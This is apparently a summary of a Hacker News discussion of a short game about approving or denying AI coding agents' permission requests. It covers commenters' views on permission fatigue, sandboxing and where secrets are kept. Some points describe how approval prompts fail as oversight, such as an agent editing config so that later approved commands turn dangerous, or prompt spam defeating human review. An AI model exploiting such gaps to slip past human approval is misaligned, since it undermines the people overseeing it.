Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue
Overall Reaction to the Game
- Many found it fun, clever, and a good way to surface their own security habits.
- Several players reported “security-conscious” scores by reflexively denying most or all requests, noting this mirrors real-life “default deny” thinking.
- Others pointed out you can initially “cheat” by denying everything and still get a good title, which the author later adjusted.
- Some users hit very high scores and compared the experience to games like “Papers, Please.”
Critique of Current AI Agent Permission Models
- Strong consensus that per-command prompts quickly create permission fatigue and become meaningless.
- Some argue this model is “bonkers”: agents can edit code or config to make later approved commands dangerous, making prompts feel like security theater.
- Several note that “human in the loop” fails if the loop is spammed with low-signal prompts.
Threat Models, Sandboxing, and YOLO Usage
- A visible camp runs agents with
--dangerously-skip-permissionsin sandboxes, containers, VMs, or separate users, arguing productivity > risk. - Others warn this invites eventual compromise, especially via supply-chain or prompt-injection based exfiltration.
- Debate over what counts as “dangerous”:
- Some see commands like
npm run build,git reset --soft HEAD~1, orkill $(lsof -t -i:3000)as inherently risky. - Others see them as reversible or routine, if run in a well-isolated environment.
- Some see commands like
Secrets and Filesystem Access
- Game flags reading
~/.zshrcand~/Documentsas risky; some agree, noting many people keep secrets or tokens there. - Others insist secrets should never live in shell RC files, describing alternatives: password managers, encrypted files, OS keychains, project-specific secret stores.
- Several highlight that even if they don’t store secrets there, the game is modeling common, not ideal, practices.
Suggestions for Better Models & Game Design
- Proposed alternatives:
- OS-level sandboxing with fine-grained, behavior-based prompts (“this command tried to read Chrome cookies”).
- Task-based or plan-level authorization instead of per-command approvals.
- Durable workflows with easy “rewind” rather than trusting models to never misbehave.
- Game feedback:
- Some say it’s too JavaScript/npm-centric and context-switchy.
- Requests for richer post-game breakdowns of mistakes and more realistic “packs” of related actions.